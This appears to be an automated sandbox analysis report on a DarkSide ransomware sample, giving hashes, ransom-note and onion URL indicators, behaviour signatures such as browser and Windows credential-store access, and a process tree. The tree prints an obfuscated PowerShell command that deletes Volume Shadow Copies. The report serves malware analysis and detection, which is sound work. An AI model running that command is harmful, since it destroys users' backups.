Overview
overview
10Static
static
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
7Resubmissions
28-07-2024 16:38
240728-t5tryssgmm 1007-07-2024 14:07
240707-rfgd8atekm 1007-07-2024 14:07
240707-re689awdpe 1013-09-2022 17:54
220913-wg1lpsgbg7 10Analysis
-
max time kernel
117s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
28-07-2024 16:38
Static task
static1
Behavioral task
behavioral1
Sample
RansomwareSamples/Avaddon_09_06_2020_1054KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
RansomwareSamples/Avaddon_09_06_2020_1054KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
RansomwareSamples/Avos_18_07_2021_403KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
RansomwareSamples/Avos_18_07_2021_403KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral5
Sample
RansomwareSamples/Babik_04_01_2021_31KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
RansomwareSamples/Babik_04_01_2021_31KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
RansomwareSamples/Babuk_20_04_2021_79KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
RansomwareSamples/Babuk_20_04_2021_79KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral9
Sample
RansomwareSamples/BlackKingdom_23_03_2021_12460KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral10
Sample
RansomwareSamples/BlackKingdom_23_03_2021_12460KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral11
Sample
RansomwareSamples/BlackMatter_02_08_2021_67KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral12
Sample
RansomwareSamples/BlackMatter_02_08_2021_67KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral13
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral15
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral17
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral18
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral19
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral21
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral22
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral23
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral24
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral25
Sample
RansomwareSamples/Hades_29_03_2021_1909KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral26
Sample
RansomwareSamples/Hades_29_03_2021_1909KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral27
Sample
RansomwareSamples/Hive_17_07_2021_808KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral28
Sample
RansomwareSamples/Hive_17_07_2021_808KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral29
Sample
RansomwareSamples/LockBit_14_02_2021_146KB.exe
Resource
win7-20240708-en
Behavioral task
behavioral30
Sample
RansomwareSamples/LockBit_14_02_2021_146KB.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral31
Sample
RansomwareSamples/MAKOP_27_10_2020_115KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral32
Sample
RansomwareSamples/MAKOP_27_10_2020_115KB.exe
Resource
win10v2004-20240709-en
General
-
Target
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
-
Size
59KB
-
MD5
0ed51a595631e9b4d60896ab5573332f
-
SHA1
7ae73b5e1622049380c9b615ce3b7f636665584b
-
SHA256
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
-
SHA512
9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5
-
SSDEEP
768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1yl3RYY23W58:0x7Fu4/ihrhDTV1ylhZ58
Malware Config
Extracted
C:\Users\Admin\README.f3d73b46.TXT
darkside
http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Renames multiple (190) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 1804 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f3d73b46.BMP" DarkSide_16_01_2021_59KB.exe Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f3d73b46.BMP" DarkSide_16_01_2021_59KB.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DarkSide_16_01_2021_59KB.exe -
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Control Panel\Desktop\WallpaperStyle = "10" DarkSide_16_01_2021_59KB.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.f3d73b46 DarkSide_16_01_2021_59KB.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.f3d73b46\ = "f3d73b46" DarkSide_16_01_2021_59KB.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f3d73b46\DefaultIcon DarkSide_16_01_2021_59KB.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f3d73b46 DarkSide_16_01_2021_59KB.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\f3d73b46\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f3d73b46.ico" DarkSide_16_01_2021_59KB.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1804 powershell.exe 2628 DarkSide_16_01_2021_59KB.exe 2628 DarkSide_16_01_2021_59KB.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeSecurityPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeTakeOwnershipPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeLoadDriverPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeSystemProfilePrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeSystemtimePrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeProfSingleProcessPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeIncBasePriorityPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeCreatePagefilePrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeBackupPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeRestorePrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeShutdownPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeDebugPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeSystemEnvironmentPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeRemoteShutdownPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeUndockPrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: SeManageVolumePrivilege 2628 DarkSide_16_01_2021_59KB.exe Token: 33 2628 DarkSide_16_01_2021_59KB.exe Token: 34 2628 DarkSide_16_01_2021_59KB.exe Token: 35 2628 DarkSide_16_01_2021_59KB.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeBackupPrivilege 3012 vssvc.exe Token: SeRestorePrivilege 3012 vssvc.exe Token: SeAuditPrivilege 3012 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2628 wrote to memory of 1804 2628 DarkSide_16_01_2021_59KB.exe 31 PID 2628 wrote to memory of 1804 2628 DarkSide_16_01_2021_59KB.exe 31 PID 2628 wrote to memory of 1804 2628 DarkSide_16_01_2021_59KB.exe 31 PID 2628 wrote to memory of 1804 2628 DarkSide_16_01_2021_59KB.exe 31 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"1⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3012
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c88f027adf377f4702d01edd42411d17
SHA1cb0f93ffeaab4a1e7d9c22ce332d9762aa5099dd
SHA256f39989c2048da0dfe98d95b77e17a972bd41e8647792683ef33e33694d0ee024
SHA51259f985af5185a5f6f07c7f786d11a0bc7915fba1891a244be65e6afaa67407d3936d287c51988d24c4ca01052fbfee01c690991bd627cd91f934615268017811
-
Filesize
1KB
MD5d4e176b40c4ea17f4870c34fad926d6e
SHA12cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA2567ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471